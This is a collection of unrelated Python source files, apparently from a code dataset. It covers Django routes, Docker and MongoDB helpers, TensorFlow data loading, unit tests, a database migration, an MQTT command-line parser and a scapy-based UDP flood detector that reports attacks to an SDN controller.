twisted.run(host='0.0.0.0',port=13579, debug=False)
#app.run(host='0.0.0.0',port=13579, debug=False)
|
15,770 | 552533fb8397798ab0b064372e9461109bb2f431 | from django.contrib import admin
from django.urls import path,include
from sitetest.views import index, consumo, model_form_upload, printer, pdf
app_name = 'sitetest'
urlpatterns = [
path('', index, name='site_index'),
path('<int:cliente_id>/consumo', consumo, name='consumo'),
path('carga/', model_form_upload, name='carga'),
path('printer/', printer, name='printer'),
path('pdf/', pdf, name='pdf'),
]
|
15,771 | d2d1a9b80a46ffdba59d0961ddcf1bbeae90fde8 | # coding: utf-8
from __future__ import print_function
import subprocess
import docker
from .utils import new_docker_client
from docker.errors import APIError
def get_repository_name(project, stage):
return '.'.join([project.name, project.current_job.name, stage]).lower()
def get_tag_with_hash(tag, hash):
return "{}-{}".format(tag, hash)
class Image(object):
def __init__(self, repository, tag):
self.repository = repository
self.tag = tag
self.client = new_docker_client()
self.old_versions = []
self._fetch_docker_image()
@property
def id(self):
return self.docker_image['Id']
@property
def repo_tag(self):
if self.tag:
return "{}:{}".format(self.repository, self.tag)
else:
return self.repository
def create_image(self, dockerfile):
for i in self.old_versions:
image_id = i['Id']
try:
self.client.remove_image(image_id)
except APIError as e:
print("couldn't delete docker image {}".format(image_id))
try:
if not self.docker_image:
print("creating image {0}".format(self.repo_tag))
subprocess.check_call(
['docker', 'build', '--rm', '-t', self.repo_tag, '.'],
cwd=dockerfile.path_dir)
self._fetch_docker_image()
except Exception as e:
print("failed creating image {0}".format(self.repo_tag))
raise e
def exists(self):
return bool(self.docker_image)
def remove(self):
self.client.remove_image(self.docker_image['Id'])
def _fetch_docker_image(self):
images = self.client.images(name=self.repository)
self.docker_image = next(
(i for i in images
if self.repo_tag in i['RepoTags']),
None)
if not self.docker_image:
self.old_versions = images
class ImageDoesNotExistError(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return repr("Image '{0}' not found".format(self.name))
|
15,772 | c0ebef47af3f5c8cadd6af3921d01786e0fa349e | [
["--SE:H", "W-S-:Bs", ],
["-N-E:Be", "WN--:X", ],
]
|
15,773 | 91ec070ea730d0e464c2cfca2c33ec264bb446ce | #!/usr/bin/env python
import mongoUtils
parser = mongoUtils.create_default_argument_parser()
options = parser.parse_args()
mongoUtils.execute_mongo_command(options, """db.getCollection("failedMessage").createIndex({"statusHistory.0.status": 1, "destination.brokerName": 1})""") |
15,774 | 6ef0ed141a50be428d03d0535153285f442cfab4 | from application import app
flask_app = app.create_app()
if __name__ == "__main__":
flask_app.run(debug=True) |
15,775 | 0d378c42a0833dc42b38efe7709fce677088c44e | class CodeGenerator:
from pymongo import MongoClient
import datetime
client = MongoClient()
codes = client.makestorybot.codes
@staticmethod
def build_block(size):
from random import choice
from string import ascii_letters, digits
return ''.join(choice(ascii_letters + digits) for _ in range(size))
def __init__(self, client=True):
if not client:
import threading
watcher = threading.Thread(target=self.code_watcher, args=(), daemon=True)
watcher.start()
def code_add(self):
generated_code = self.build_block(8)
while self.codes.count_documents({'code': generated_code}) != 0:
generated_code = self.build_block(8)
one_code = {'code': generated_code, 'expired': self.datetime.datetime.now() + self.datetime.timedelta(days=3)}
self.codes.insert_one(one_code)
return generated_code
def code_watcher(self):
from time import sleep
while True:
self.codes.delete_many({'expired': {'$lte': self.datetime.datetime.now()}})
sleep(60)
def code_use(self, one_code):
if self.codes.delete_one({'code': one_code}).deleted_count > 0:
return True
return False
if __name__ == '__main__':
Generator = CodeGenerator(client=False)
print(Generator.build_block(20))
# Generator.code_add()
#time.sleep(10)
#
# two = codes.find()
# for one in codes.find({'code': 'V4H8OpvI'}):
# print(one['expired'] - datetime.datetime.now())
#
# codes.insert_one(one_code)
|
15,776 | 905ba9c52fc806e63379375a91f800e196684dfd | import vampytest
from os.path import join as join_paths
from types import FunctionType
from ..loading import find_dot_env_file
def test__find_dot_env_file__0():
"""
Tests whether ``find_dot_env_file`` works as intended.
Case: Launched location is `None`.
"""
find_launched_location = lambda : None
expected_output = None
find_dot_env_file_copy = FunctionType(
find_dot_env_file.__code__,
{**find_dot_env_file.__globals__, 'find_launched_location': find_launched_location},
find_dot_env_file.__name__,
find_dot_env_file.__defaults__,
find_dot_env_file.__closure__,
)
output = find_dot_env_file_copy()
vampytest.assert_instance(output, str, nullable = True)
vampytest.assert_eq(output, expected_output)
def test__find_dot_env_file__1():
"""
Tests whether ``find_dot_env_file`` works as intended.
Case: Env file not exists.
"""
base_location = 'test'
find_launched_location = lambda : join_paths(base_location, '__init__.py')
is_file = lambda path : False
expected_output = None
find_dot_env_file_copy = FunctionType(
find_dot_env_file.__code__,
{**find_dot_env_file.__globals__, 'find_launched_location': find_launched_location, 'is_file': is_file},
find_dot_env_file.__name__,
find_dot_env_file.__defaults__,
find_dot_env_file.__closure__,
)
output = find_dot_env_file_copy()
vampytest.assert_instance(output, str, nullable = True)
vampytest.assert_eq(output, expected_output)
def test__find_dot_env_file__2():
"""
Tests whether ``find_dot_env_file`` works as intended.
Case: Env file exists.
"""
base_location = 'test'
find_launched_location = lambda : join_paths(base_location, '__init__.py')
is_file = lambda path : True
expected_output = join_paths(base_location, '.env')
find_dot_env_file_copy = FunctionType(
find_dot_env_file.__code__,
{**find_dot_env_file.__globals__, 'find_launched_location': find_launched_location, 'is_file': is_file},
find_dot_env_file.__name__,
find_dot_env_file.__defaults__,
find_dot_env_file.__closure__,
)
output = find_dot_env_file_copy()
vampytest.assert_instance(output, str, nullable = True)
vampytest.assert_eq(output, expected_output)
|
15,777 | 0f7ef1dee85f6f7f3a11312d14f8bfa4e3276a69 | import tensorflow as tf
import numpy as np
import cv2
import time
import os
import sys
# some image loader helpers
def getOptimizer(cfgs, learning_rate):
type_ = cfgs['train']['optimizer']
momentum = cfgs['train']['momentum']
if(type_ == 'adam'):
return tf.train.AdamOptimizer(learning_rate=learning_rate)
if(type_ == 'momentum'):
return tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=momentum)
if(type_ == 'gradientDescent'):
return tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
if(type_ == 'RMSProp'):
return tf.train.RMSPropOptimizer(learning_rate=learning_rate)
# make a session with some config settings as well
# - you can modify this if you want to add anymore config settings
# - additionally the gpu fraction is .4 by default
def get_session(gpu_fraction=0.4):
'''Assume that you have 6GB of GPU memory and want to allocate ~2GB'''
num_threads = 2
# gives error that has to deal with the version of tensorflow, and the cudNN version as well
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_fraction)
#return tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, intra_op_parallelism_threads=num_threads))
config = tf.ConfigProto() #allow_soft_placement=True, log_device_placement=False)
config.gpu_options.allow_growth = True
config.allow_soft_placement=False
config.gpu_options.per_process_gpu_memory_fraction=gpu_fraction
config.intra_op_parallelism_threads=num_threads
#config.log_device_placement=True
sess = tf.Session(config=config)
return sess
# for loading a single test image
def get_test_image(cfgs, image_path, w=128, h=256, standardize=True, channel_swap=None):
if(cfgs['data']['root_paths']):
image_path = image_path.replace('\\', '/')
image = cv2.imread(image_path)
label = image_path.split('/')[-1].split(cfgs['data']['label_seperator'])[0]
else:
image = cv2.imread(cfgs['data']['data_start'] + image_path)
label = image_path.split(cfgs['data']['label_seperator'])[0]
image = cv2.resize(image, (w, h))
if(standardize):
image = (image - np.mean(image)) / (np.std(image))
if(channel_swap is not None):
image = image[:,:,channel_swap]
# Soem more label stuff
label = cfgs['data']['classes'].index(label)
bin_label = [0 for x in range(len(cfgs['data']['classes']))]
bin_label[label] = 1
return image, bin_label
# return an image batch, usually for training
def get_images(cfgs, batch_paths, ids, w=128, h=256, augment=True, standardize=True, channel_swap=None):
images = []
labels = []
for idx, b in enumerate(ids):
path_ = batch_paths[b]
path_ = path_.replace('\\','/')
if(cfgs['data']['root_paths']):
image = cv2.imread(path_)
label = path_.split('/')[-1].split(cfgs['data']['label_seperator'])[0]
# else add the base path to it
else:
image = cv2.imread(cfgs['data']['data_start'] + path_)
label = path_.split(cfgs['data']['label_seperator'])[0]
# resize it
image = cv2.resize(image, (w,h))
# sometimes flip the image
# - If more augmentation is needed,
# add additional lines here
if (augment and np.random.random() > 0.5):
image = np.fliplr(image)
# normalize the image
#image = normalize(image)
if(standardize):
image = (image - np.mean(image)) / (np.std(image))
# default is none but sometimes we might want to swap the channels
if(channel_swap is not None):
image = image[:,:,channel_swap]
images.append(image)
label = cfgs['data']['classes'].index(label)
bin_label = [0 for x in range(len(cfgs['data']['classes']))]
bin_label[label] = 1
labels.append(bin_label)
return images, labels
# A get batch helper
# - This function is a helper to call get_images
# - needs a path array and an ids array that holds all the indicies in the paths array
def get_batch(cfgs, paths, ids, batch_size=5, standardize=False, w=128, h=256):
batch_ids = np.random.choice(ids,batch_size)
return get_images(cfgs, paths, batch_ids, standardize=standardize, w=w, h=h)
# file system helpers
|
15,778 | 9a8d4b9b3af7b964c318a58d6339453045dac676 | # !/usr/bin/env python
# -*- coding: utf-8 -*-
from logbook.base import NOTSET
from logbook.handlers import Handler, StringFormatterHandlerMixin
from rqalpha.environment import Environment
from rqalpha.interface import AbstractMod
from rqalpha.utils.logger import user_system_log, user_log
class LogHandler(Handler, StringFormatterHandlerMixin):
def __init__(self, send_log_handler, mod_config, level=NOTSET, format_string=None, filter=None, bubble=False):
Handler.__init__(self, level, filter, bubble)
StringFormatterHandlerMixin.__init__(self, format_string)
self.send_log_handler = send_log_handler
self.mod_config = mod_config
def _write(self, level_name, item):
dt = Environment.get_instance().calendar_dt
self.send_log_handler(dt, item, level_name, mod_config=self.mod_config)
def emit(self, record):
msg = self.format(record)
self._write(record.level_name, msg)
class CustomLogHandlerMod(AbstractMod):
def _send_log(self, dt, text, log_tag, mod_config):
with open(f'{mod_config.log_file}', mode=mod_config.log_mode) as f:
f.write(f'[{dt}] {log_tag}: {text}\n')
def start_up(self, env, mod_config):
user_log.handlers.append(LogHandler(self._send_log, mod_config, bubble=True))
user_system_log.handlers.append(LogHandler(self._send_log, mod_config, bubble=True))
def tear_down(self, code, exception=None):
pass
def load_mod():
return CustomLogHandlerMod()
|
15,779 | 0e13fece6cb7267ccf40bd3dcb3109efdf1fbdef | import matplotlib.pyplot as plt
import numpy as np
bitmap = np.fabs(np.random.randn(100, 100))
np.min(bitmap)
np.max(bitmap)
bitmap = bitmap - np.min(bitmap)
bitmap = bitmap/np.max(bitmap)
bitmap[:, 45:55] = 1
img = plt.imshow(bitmap)
plt.show()
|
15,780 | f6168ac3bb556752b5072a8ca3c22e9a745cacac | # Copyright (c) 2019 Cable Television Laboratories, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import datetime
import logging
import threading
import time
from anytree import search, Node, RenderTree
from scapy.all import sniff
from scapy.layers.inet import IP, UDP, TCP
from scapy.layers.inet6 import IPv6
from scapy.layers.l2 import Ether
from trans_sec.consts import UDP_PROTO, UDP_TRPT_DST_PORT, IPV4_TYPE, \
UDP_INT_DST_PORT, IPV6_TYPE
from trans_sec.packet.inspect_layer import (
IntHeader, IntMeta1, IntMeta2, IntShim, SourceIntMeta, TelemetryReport,
EthInt)
logger = logging.getLogger('oinc')
class PacketAnalytics(object):
"""
Analytics Engine class
"""
def __init__(self, sdn_interface, packet_count=100, sample_interval=60):
"""
Constructor
:param sdn_interface: the HTTP interface to the SDN Controller
:param packet_count: the number of packets to trigger an attack
:param sample_interval: the interval in seconds used for counting the
packets
"""
self.sdn_interface = sdn_interface
self.packet_count = packet_count
self.sample_interval = sample_interval
self.count_map = dict()
self.sniff_stop = threading.Event()
logger.debug("Completed binding packet layers")
def start_sniffing(self, iface, udp_dport=UDP_TRPT_DST_PORT):
"""
Starts the sniffer thread
:param iface: the interface to sniff
:param udp_dport: the UDP dport to sniff (default 555)
"""
logger.info("AE monitoring iface %s", iface)
sniff(iface=iface,
prn=lambda packet: self.handle_packet(packet, udp_dport),
stop_filter=lambda p: self.sniff_stop.is_set())
def stop_sniffing(self):
"""
Stops the sniffer thread
"""
self.sniff_stop.set()
def handle_packet(self, packet, udp_dport):
"""
Determines whether or not to process this packet
:param packet: the packet to process
:param udp_dport: the UDP protocol dport value to filter
:return T/F - True when an attack has been triggered
"""
return self.process_packet(packet, udp_dport)
def _send_attack(self, **attack_dict):
"""
Sends an HTTP POST to the SDN controllers HTTP interface 'attack'
:param attack_dict: the data to send
:raises Exception: due to the remote HTTP POST
"""
logger.info('Start attack - %s', attack_dict)
self.sdn_interface.post('attack', attack_dict)
@abc.abstractmethod
def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
"""
Processes a packet to determine if an attack is occurring
:param packet: the packet to process
:param udp_dport: the UDP port value on which to filter
:return: T/F - True when an attack has been triggered
"""
return
def extract_int_data(ether_pkt):
"""
Parses the required data from the packet
:param ether_pkt: the packet to parse
:return: dict with choice header fields extracted
"""
if ether_pkt.type == IPV4_TYPE:
ip_pkt = IP(_pkt=ether_pkt.payload)
logger.debug('IPv4 dst - [%s], src - [%s], proto - [%s]',
ip_pkt.dst, ip_pkt.src, ip_pkt.proto)
elif ether_pkt.type == IPV6_TYPE:
ip_pkt = IPv6(_pkt=ether_pkt.payload)
logger.debug('IPv6 dst - [%s], src - [%s], nh - [%s]',
ip_pkt.dst, ip_pkt.src, ip_pkt.nh)
else:
logger.warn('Unable to process ether type - [%s]', ether_pkt.type)
return None
udp_int_pkt = UDP(_pkt=ip_pkt.payload)
logger.debug('UDP INT sport - [%s], dport - [%s], len - [%s]',
udp_int_pkt.sport, udp_int_pkt.dport, udp_int_pkt.len)
int_shim_pkt = IntShim(_pkt=udp_int_pkt.payload)
logger.debug('INT Shim next_proto - [%s], npt - [%s], length - [%s]',
int_shim_pkt.next_proto, int_shim_pkt.npt,
int_shim_pkt.length)
int_hdr_pkt = IntHeader(_pkt=int_shim_pkt.payload)
logger.debug('INT Header ver - [%s]', int_hdr_pkt.ver)
int_meta_1 = IntMeta1(_pkt=int_hdr_pkt.payload)
logger.debug('INT Meta 1 switch_id - [%s]', int_meta_1.switch_id)
int_meta_2 = IntMeta2(_pkt=int_meta_1.payload)
logger.debug('INT Meta 2 switch_id - [%s]', int_meta_2.switch_id)
source_int_pkt = SourceIntMeta(_pkt=int_meta_2.payload)
logger.debug('SourceIntMeta switch_id - [%s], orig_mac - [%s]',
source_int_pkt.switch_id, source_int_pkt.orig_mac)
if int_shim_pkt.next_proto == UDP_PROTO:
tcp_udp_pkt = UDP(_pkt=source_int_pkt.payload)
logger.debug('TCP sport - [%s], dport - [%s], len - [%s]',
tcp_udp_pkt.sport, tcp_udp_pkt.dport, tcp_udp_pkt.len)
else:
tcp_udp_pkt = TCP(_pkt=source_int_pkt.payload)
logger.debug('TCP sport - [%s], dport - [%s]',
tcp_udp_pkt.sport, tcp_udp_pkt.dport)
orig_mac = source_int_pkt.orig_mac
try:
out = dict(
devMac=orig_mac,
devAddr=ip_pkt.src,
dstAddr=ip_pkt.dst,
dstPort=tcp_udp_pkt.dport,
protocol=int_shim_pkt.next_proto,
packetLen=len(ether_pkt),
)
except Exception as e:
logger.error('Error extracting header data - %s', e)
return None
logger.debug('Extracted header data [%s]', out)
return out
def extract_trpt_data(udp_packet):
"""
Parses the required data from the packet
:param udp_packet: the packet to parse
:return: dict with choice header fields extracted
"""
logger.debug('UDP packet sport [%s], dport [%s], len [%s]',
udp_packet.sport, udp_packet.dport, udp_packet.len)
trpt_pkt = TelemetryReport(_pkt=udp_packet.payload)
trpt_eth = EthInt(trpt_pkt.payload)
logger.debug('TRPT ethernet dst - [%s], src - [%s], type - [%s]',
trpt_eth.dst, trpt_eth.src, trpt_eth.type)
return extract_int_data(trpt_eth)
class Oinc(PacketAnalytics):
"""
Oinc implementation of PacketAnalytics
"""
def __init__(self, sdn_interface, packet_count=100, sample_interval=60):
super(self.__class__, self).__init__(sdn_interface, packet_count,
sample_interval)
self.tree = Node('root')
def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
mac, src_ip, dst_ip, dst_port, packet_size = self.__parse_tree(packet)
if mac:
if src_ip and dst_ip and dst_port and packet_size:
self.__packet_with_mac(mac, src_ip, dst_ip, dst_port,
packet_size)
self.__manage_tree()
def __parse_tree(self, packet):
"""
Processes a packet from a new device that has not been counted
"""
info = extract_int_data(packet[Ether])
logger.info('Processing packet with info [%s]', info)
macs = search.findall_by_attr(self.tree, info.get('srcMac'),
name='name', maxlevel=2, maxcount=1)
mac = None
src_ip = None
dst_ip = None
dst_port = None
packet_size = None
if len(macs) > 0:
mac = macs[0]
src_ips = search.findall_by_attr(
mac, info.get('srcIP'), name='name', maxlevel=2, maxcount=1)
if len(src_ips) is not 0:
src_ip = src_ips[0]
dst_ips = search.findall_by_attr(
src_ip, info.get('dstIP'), name='name', maxlevel=2,
maxcount=1)
if len(dst_ips) is not 0:
dst_ip = dst_ips[0]
logger.info('Processing source IPs - %s', src_ips)
dst_ports = search.findall_by_attr(
dst_ip, info.get('dstPort'), name='name',
maxlevel=2, maxcount=1)
if len(dst_ports) is not 0:
dst_port = dst_ports[0]
packet_sizes = search.findall_by_attr(
dst_port, info.get('packet_size'),
name='name', maxlevel=2, maxcount=1)
if len(packet_sizes) is not 0:
packet_size = packet_sizes[0]
return mac, src_ip, dst_ip, dst_port, packet_size
def __manage_tree(self):
"""
Updates the tree
I don't think this routine does anything at all
"""
for pre, fill, node in RenderTree(self.tree):
if node.name is 'count':
logger.info(
"Tree info %s%s: %s %s p/s attack: %s",
pre, node.name, node.value, node.pps, node.attack)
else:
logger.info("Pre - [%s], Fill - [%s], Node - [%s]",
pre, fill, node.name)
def __packet_with_mac(self, mac, src_ip, dst_ip, dst_port, packet_size):
"""
Processes a packet from an existing device that has been counted
"""
logger.debug('Packet with MAC [%s] and source IP [%s]', mac, src_ip)
count = packet_size.children[0]
count.value = count.value + 1
base_time = count.time
current_time = datetime.datetime.today()
delta = (current_time - base_time).total_seconds()
count.pps = count.value / delta
if (count.value > 3 and count.pps > 100
and not count.attack):
logger.info('UDP Flood attack detected')
count.attack = True
# Send to SDN
try:
self._send_attack(**dict(
src_mac=mac.name,
src_ip=src_ip.name,
dst_ip=dst_ip.name,
dst_port=dst_port.name,
packet_size=packet_size.name,
attack_type='UDP Flood'))
except Exception as e:
logger.error('Unexpected error [%s]', e)
if delta > 60:
count.time = current_time
count.value = 1
class SimpleAE(PacketAnalytics):
"""
Simple implementation of PacketAnalytics where the count for detecting
attack notifications is based on the unique hash of the extracted INT data
"""
def __init__(self, sdn_interface, packet_count=100, sample_interval=60):
super(self.__class__, self).__init__(sdn_interface, packet_count,
sample_interval)
# Holds the last time an attack call was issued to the SDN controller
self.attack_map = dict()
def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
"""
Processes a packet to determine if an attack is occurring if the IP
protocol is as expected
:param packet: the packet to process
:param udp_dport: the UDP port value on which to filter
:return: T/F - True when an attack has been triggered
"""
logger.debug('Packet data - [%s]', packet.summary())
ip_pkt = None
protocol = None
if packet[Ether].type == IPV4_TYPE:
ip_pkt = IP(_pkt=packet[Ether].payload)
protocol = ip_pkt.proto
elif packet[Ether].type == IPV6_TYPE:
ip_pkt = IPv6(_pkt=packet[Ether].payload)
protocol = ip_pkt.nh
if ip_pkt and protocol and protocol == UDP_PROTO:
udp_packet = UDP(_pkt=ip_pkt.payload)
logger.debug(
'udp sport - [%s] dport - [%s] - expected dport - [%s]',
udp_packet.sport, udp_packet.dport, udp_dport)
if udp_packet.dport == udp_dport and udp_dport == UDP_INT_DST_PORT:
int_data = extract_int_data(packet[Ether])
if int_data:
return self.__process(int_data)
else:
logger.warn('Unable to debug INT data')
return False
elif (udp_packet.dport == udp_dport
and udp_dport == UDP_TRPT_DST_PORT):
int_data = extract_trpt_data(udp_packet)
if int_data:
return self.__process(int_data)
else:
logger.warn('Unable to debug INT data')
return False
else:
logger.debug(
'Cannot process UDP packet dport of - [%s], expected - '
'[%s]', udp_packet.dport, udp_dport)
return False
def __process(self, int_data):
"""
Processes INT data for analysis
:param int_data: the data to process
:return:
"""
attack_map_key = hash(str(int_data))
logger.debug('Attack map key - [%s]', attack_map_key)
if not self.count_map.get(attack_map_key):
self.count_map[attack_map_key] = list()
curr_time = datetime.datetime.now()
self.count_map.get(attack_map_key).append(curr_time)
times = self.count_map.get(attack_map_key)
count = 0
for eval_time in times:
delta = (curr_time - eval_time).total_seconds()
if delta > self.sample_interval:
times.remove(eval_time)
else:
count += 1
if count > self.packet_count:
logger.debug('Attack detected - count [%s] with key [%s]',
count, attack_map_key)
attack_dict = dict(
src_mac=int_data['devMac'],
src_ip=int_data['devAddr'],
dst_ip=int_data['dstAddr'],
dst_port=int_data['dstPort'],
packet_size=int_data['packetLen'],
attack_type='UDP Flood')
# Send to SDN
last_attack = self.attack_map.get(attack_map_key)
if not last_attack or time.time() - last_attack > 1:
logger.info('Calling SDN, last attack sent - [%s]',
last_attack)
try:
self.attack_map[attack_map_key] = time.time()
self._send_attack(**attack_dict)
return True
except Exception as e:
logger.error('Unexpected error [%s]', e)
return False
else:
logger.debug(
'Not calling SDN as last attack notification for %s'
' was only %s seconds ago',
attack_dict, time.time() - last_attack)
return True
else:
logger.debug('No attack detected - count [%s]', count)
return False
class IntLoggerAE(PacketAnalytics):
"""
Logs only INT packets
"""
def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
"""
Logs the INT data within the packet
:param packet: the INT packet
:param udp_dport: the UDP port value on which to filter
:return: False
"""
logger.info('INT Packet data - [%s]', extract_int_data(packet[Ether]))
return False
class LoggerAE(PacketAnalytics):
"""
Logging only
"""
def handle_packet(self, packet, ip_proto=None):
"""
Logs every received packet's summary data
:param packet: extracts data from here
:param ip_proto: does nothing here
:return: False
"""
logger.info('Packet data - [%s]', packet.summary())
return False
def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
"""
No need to implement
:param packet: the packet that'll never come in
:param udp_dport: the UDP port value on which to filter
:raises NotImplemented
"""
raise NotImplemented
|
15,781 | a6d39f6c03b9d625c61a288d442078ea8ea6fd6a | """Test derivation of `et`."""
import iris
import numpy as np
import pytest
from cf_units import Unit
import esmvalcore.preprocessor._derive.et as et
@pytest.fixture
def cubes():
hfls_cube = iris.cube.Cube([[1.0, 2.0], [0.0, -2.0]],
standard_name='surface_upward_latent_heat_flux',
attributes={'positive': 'up', 'test': 1})
ta_cube = iris.cube.Cube([1.0], standard_name='air_temperature')
return iris.cube.CubeList([hfls_cube, ta_cube])
def test_et_calculation(cubes):
derived_var = et.DerivedVariable()
out_cube = derived_var.calculate(cubes)
np.testing.assert_allclose(
out_cube.data, np.array([[0.03505071, 0.07010142],
[0.0, -0.07010142]]))
assert out_cube.units == Unit('mm day-1')
assert 'positive' not in out_cube.attributes
def test_et_calculation_no_positive_attr(cubes):
cubes[0].attributes.pop('positive')
assert cubes[0].attributes == {'test': 1}
derived_var = et.DerivedVariable()
out_cube = derived_var.calculate(cubes)
assert 'positive' not in out_cube.attributes
|
15,782 | dae7fe2daddaa2c728b171fb7887ff1b00af474d | """empty message
Revision ID: 7a794ab9febb
Revises: 7ce04814b9b7
Create Date: 2020-02-28 22:52:00.672000
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '7a794ab9febb'
down_revision = '7ce04814b9b7'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('university', sa.Column('state_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'university', 'state', ['state_id'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'university', type_='foreignkey')
op.drop_column('university', 'state_id')
# ### end Alembic commands ###
|
15,783 | 5f5646cfb57a68ae51d9988646bcbf7fcc77c926 | import pytest
from src.utils.validators.numeric_validator import NumericValidator
class ExampleModel:
prop_to_validate = None
@pytest.fixture
def model():
return ExampleModel()
def test_is_valid_returns_true_when_property_value_is_none_and_property_is_nullable(model):
validator = NumericValidator('prop_to_validate', int, nullable=True)
actual = validator.is_valid(model)
assert actual
def test_is_valid_returns_false_when_property_value_is_none_and_property_is_not_nullable(model):
validator = NumericValidator('prop_to_validate', int)
actual = validator.is_valid(model)
assert not actual
def test_is_valid_returns_false_when_property_value_is_not_provided_type(model):
model.prop_to_validate = 10
validator = NumericValidator('prop_to_validate', float)
actual = validator.is_valid(model)
assert not actual
def test_is_valid_returns_false_when_property_value_is_lower_than_min(model):
model.prop_to_validate = 10
validator = NumericValidator('prop_to_validate', int, min=11)
actual = validator.is_valid(model)
assert not actual
def test_is_valid_returns_true_when_property_value_is_valid_and_value_is_greater_than_min(model):
model.prop_to_validate = 10
validator = NumericValidator('prop_to_validate', int, min=9)
actual = validator.is_valid(model)
assert actual
def test_is_valid_returns_true_when_property_value_is_valid_and_value_is_equal_to_min(model):
model.prop_to_validate = 10
validator = NumericValidator('prop_to_validate', int, min=10)
actual = validator.is_valid(model)
assert actual
def test_is_valid_returns_false_when_property_value_is_greater_than_max(model):
model.prop_to_validate = 10
validator = NumericValidator('prop_to_validate', int, max=9)
actual = validator.is_valid(model)
assert not actual
def test_is_valid_returns_true_when_property_value_is_valid_and_value_is_lower_than_max(model):
model.prop_to_validate = 10
validator = NumericValidator('prop_to_validate', int, max=11)
actual = validator.is_valid(model)
assert actual
def test_is_valid_returns_true_when_property_value_is_valid_and_value_is_equal_to_max(model):
model.prop_to_validate = 10
validator = NumericValidator('prop_to_validate', int, max=10)
actual = validator.is_valid(model)
assert actual
def test_is_valid_returns_true_when_property_value_is_valid(model):
model.prop_to_validate = 10
validator = NumericValidator('prop_to_validate', int)
actual = validator.is_valid(model)
assert actual |
15,784 | decbe8802652c158f7ccead62df8fc27c1307f97 | """
nn platform
This platform uses nanomsg sockets (both IPC and TCP are supported) to send and
receive packets. Unlike for other platforms, the '--interface' option is
ignored, you instead have to use '--device-socket'. This is because there has to
be a 1-1 mapping between the devices and the nanomsg sockets.
For example:
--device-socket 0-[1,2,5-8]@<socket addr>
In this case, ports 1, 2 and 5 through 8 (included) are enabled on device 0.
The socket address must be either:
ipc://<path to file>
tcp://<iface>:<port>
"""
def platform_config_update(config):
"""
Update configuration for the nn platform
@param config The configuration dictionary to use/update
"""
port_map = {}
for (device, ports, socket_addr) in config["device_sockets"]:
for port in ports:
port_map[(device, port)] = socket_addr
# no default configuration for this platform
config["port_map"] = port_map
|
15,785 | 08e7a8096b641842053958fbbdc3cca755ca70a5 | import pandas as pd
from pathlib import Path
from tqdm import tqdm
RESULTS_PATH = Path(__file__).parent / 'results'
if __name__ == '__main__':
RESULTS_PATH.mkdir(exist_ok=True, parents=True)
for trial in ['preliminary_energy', 'final']:
input_directory = Path(f'results_{trial}')
dfs = []
for path in tqdm(input_directory.iterdir(), desc=f'Trial: {trial}'):
df = pd.read_csv(path)
dfs.append(df)
df = pd.concat(dfs)
df.to_csv(RESULTS_PATH / f'results_{trial}.csv', index=False)
|
15,786 | 5a290c8ca3348a28b86e0a0de697c27839a3c5dc | """
Created on 9 Mar 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
import optparse
# --------------------------------------------------------------------------------------------------------------------
class CmdMQTTPeers(object):
"""unix command line handler"""
def __init__(self):
"""
Constructor
"""
self.__parser = optparse.OptionParser(usage="%prog [-a] { -p [-e] | -l [-n HOSTNAME] [-t TOPIC] | -m | "
"-c HOSTNAME TAG SHARED_SECRET TOPIC | "
"-u HOSTNAME { -s SHARED_SECRET | -t TOPIC } | "
"-r HOSTNAME } [-i INDENT] [-v]", version="%prog 1.0")
# source...
self.__parser.add_option("--aws", "-a", action="store_true", dest="aws", default=False,
help="Use AWS S3 instead of local storage")
# functions...
self.__parser.add_option("--import", "-p", action="store_true", dest="import_peers", default=False,
help="import MQTT peers from stdin")
self.__parser.add_option("--list", "-l", action="store_true", dest="list", default=False,
help="list the stored MQTT peers to stdout")
self.__parser.add_option("--missing", "-m", action="store_true", dest="missing", default=False,
help="list known devices missing from S3 MQTT peers")
self.__parser.add_option("--create", "-c", type="string", nargs=4, action="store", dest="create",
help="create an MQTT peer")
self.__parser.add_option("--update", "-u", type="string", nargs=1, action="store", dest="update",
help="update an MQTT peer")
self.__parser.add_option("--remove", "-r", type="string", nargs=1, action="store", dest="remove",
help="delete an MQTT peer")
# filters...
self.__parser.add_option("--hostname", "-n", type="string", nargs=1, action="store", dest="hostname",
help="filter peers with the given hostname substring")
self.__parser.add_option("--shared-secret", "-s", type="string", nargs=1, action="store", dest="shared_secret",
help="specify shared secret")
self.__parser.add_option("--topic", "-t", type="string", nargs=1, action="store", dest="topic",
help="specify topic")
# output...
self.__parser.add_option("--echo", "-e", action="store_true", dest="echo", default=False,
help="echo stdin to stdout (import only)")
self.__parser.add_option("--indent", "-i", type="int", nargs=1, action="store", dest="indent",
help="pretty-print the output with INDENT (not with echo)")
self.__parser.add_option("--verbose", "-v", action="store_true", dest="verbose", default=False,
help="report narrative to stderr")
self.__opts, self.__args = self.__parser.parse_args()
# ----------------------------------------------------------------------------------------------------------------
def is_valid(self):
count = 0
if self.is_import():
count += 1
if self.missing:
count += 1
if self.list:
count += 1
if self.is_create():
count += 1
if self.is_update():
count += 1
if self.is_remove():
count += 1
if count != 1:
return False
if not self.is_import() and self.echo:
return False
if self.__opts.list is None and (self.__opts.hostname is not None or self.__opts.for_topic is not None):
return False
if self.missing and not self.aws:
return False
if self.echo and self.indent is not None:
